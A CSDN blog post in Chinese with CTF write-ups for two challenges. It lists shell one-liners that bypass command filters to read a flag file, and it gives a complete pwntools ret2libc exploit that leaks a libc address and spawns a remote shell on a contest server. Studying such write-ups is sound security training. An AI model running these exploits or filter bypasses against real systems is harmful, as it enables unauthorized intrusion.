[HUBUCTF 2022 新生赛]singout
这题是道签到题,直接nc但是cat flag得不到flag
我们可以用:
1 cat flag
2 nl${IFS}f*
3 tac fla* >&2
4 tac f\lag >&2
5 tail ./*
6 tac${IFS}f*
7 tac$IFS$9f*
8 tac ./*
用这些得到flag
[LitCTF 2023]狠狠的溢出涅~
查看发现是64位文件
这道题给了libc,可能涉及ret2libc往后看看
查看main函数发现这里涉及栈溢出,但是注意到了这里有个strlen,它的作用是防止用户进行栈溢出的,所有我们要用\x00来绕过它。
发现这题缺失了system和binsh果然是ret2libc
exp:
from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28829')
elf = ELF('/home/xp/tm/bin/k')
libc = ELF('/home/xp/tm/libc/libc-2.31.so')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.sym['main']
ret = 0x400556
rdi = 0x4007d3
padding = b'\x00' + b'a'*(0x67) #0x60+0x8-0x1
payload = padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
put=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(put))
base = put - libc.sym['puts']
sys = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
io.recvuntil(b'message:')
payload1 = padding + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
io.sendline(payload1)
io.interactive()
得到我们的flag
标签:10,p64,puts,libc,flag,io,tac,PWN,NSSCTF From: https://blog.csdn.net/fanshaoze/article/details/142766333